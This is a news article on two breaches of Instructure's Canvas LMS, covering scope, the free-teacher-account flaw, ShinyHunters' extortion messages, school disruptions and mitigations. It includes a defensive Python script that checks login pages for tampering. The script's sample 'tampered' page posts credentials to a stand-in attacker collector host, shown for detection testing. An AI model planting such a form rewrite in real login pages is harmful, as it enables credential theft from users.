
Second Canvas Breach Exposes Data of Nearly 300 Million Users

Instructure's Canvas LMS suffered a repeat attack, compromising personal messages of nearly 300 million users and prompting a shutdown of free teacher accounts.

Peter Olaleru, Cybersecurity Editor


TL;DR: Instructure confirmed a second Canvas breach on May 7, exposing personal data of almost 300 million users and prompting a temporary shutdown of Free‑For‑Teacher accounts.

### Context

Instructure’s Canvas learning management system powers grades, assignments and communications for K‑12 schools and universities worldwide. The platform experienced its first publicized breach on May 1, traced to a flaw in the free teacher‑account feature. Just a week later, the same vulnerability was exploited again, disrupting final‑exam week for thousands of institutions.

### Key Facts

- Timeline: Attackers accessed Canvas on April 29 and again on May 7. Instructure announced the second incident on its status page on May 7 and restored service by May 8.
- Scope: The May 7 breach exposed personal messages and other identifiers for nearly 300 million users, according to the Center for Democracy & Technology. Earlier exposure included names, email addresses and student IDs.
- Attack vector: Both incidents leveraged a misconfiguration in the Free‑For‑Teacher account tier, allowing unauthenticated actors to gain entry and modify login pages.
- Threat actor: Messages displayed to victims referenced the ShinyHunters ransomware group, which demanded settlements by May 12. No ransom was paid, but the group’s branding confirmed their involvement.
- Impact on education: Pennsylvania State University canceled night exams on May 7 and all day exams on May 8. Roanoke County Public Schools warned users not to interact with suspicious messages. Multiple universities reported similar alerts.
- Financial and operational cost: While Instructure has not disclosed a monetary figure, the outage forced districts to grant grace periods for assignments and likely incurred emergency IT expenses.

### What It Means

The repeat exploitation of the same free‑account flaw highlights a systemic weakness in how ed‑tech vendors secure low‑risk service tiers. Schools now face the reality that student data—grades, attendance and private communications—resides on platforms they cannot audit directly. The breach also underscores the limited regulatory oversight after the U.S. Department of Education’s Office of Educational Technology was shuttered, leaving institutions to rely on vendor security practices alone.

### Mitigations

- Disable or restrict free‑teacher accounts until a permanent fix is deployed.
- Apply vendor patches immediately; Instructure is expected to release a hardening update for the affected authentication flow.
- Monitor for MITRE ATT&CK technique T1078 (Valid Accounts) and T1566 (Phishing) signatures, as attackers altered login pages to harvest credentials.
- Enforce multi‑factor authentication for all educator and student accounts to limit credential reuse.
- Conduct a rapid inventory of all third‑party integrations with Canvas and verify they meet the latest security baselines.
- Prepare an incident‑response playbook specific to LMS outages, including communication templates for students, parents and staff.
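The login-page tampering mentioned in the monitoring item is something an institution can check for on its own side of the platform. The following is an added example, not Instructure's code or anything from the article: it parses a login page, flags any credential form or script that points off the institution's allowlisted hosts, and compares the page against a previously recorded hash baseline. The host names, `TRUSTED_HOSTS` allowlist and sample HTML are constructed for the demonstration.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed, institution-specific allowlist of hosts a Canvas login page may
# post credentials to or load scripts from (constructed, not from Instructure).
TRUSTED_HOSTS = {"canvas.example.edu", "sso.example.edu"}


class LoginPageAuditor(HTMLParser):
    """Collect every form action and external script source on the page."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])


def _host_allowed(url, page_host):
    """Relative URLs stay on the page's own origin; absolute ones must be allowlisted."""
    host = urlparse(url).netloc.split("@")[-1].split(":")[0].lower()
    return not host or host == page_host or host in TRUSTED_HOSTS


def baseline_for(html):
    """Record this digest when the page is known-good; re-check it on every poll."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def audit_login_page(html, page_host, baseline_sha256=None):
    """Return a list of findings; an empty list means no tampering indicators."""
    parser = LoginPageAuditor()
    parser.feed(html)
    findings = []
    for action in parser.form_actions:
        if not _host_allowed(action, page_host):
            findings.append(f"credential form posts off-origin: {action}")
    for src in parser.script_srcs:
        if not _host_allowed(src, page_host):
            findings.append(f"script loaded from untrusted host: {src}")
    if baseline_sha256 and baseline_for(html) != baseline_sha256:
        findings.append("page content differs from recorded baseline")
    return findings


# Constructed sample pages: a clean login form and the same page with its
# action rewritten to an attacker-controlled collector.
CLEAN_PAGE = ('<form action="/login/canvas" method="post">'
              '<input name="user"><input name="password" type="password"></form>')
TAMPERED_PAGE = CLEAN_PAGE.replace(
    'action="/login/canvas"', 'action="https://collector.attacker-example.test/p"')
```

Run the audit on a schedule against the live login URL and alert on any non-empty result; the baseline digest should be refreshed only after a verified vendor change.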

Watch for Instructure’s forthcoming security advisory and any legal actions that may shape future compliance requirements for educational technology providers.
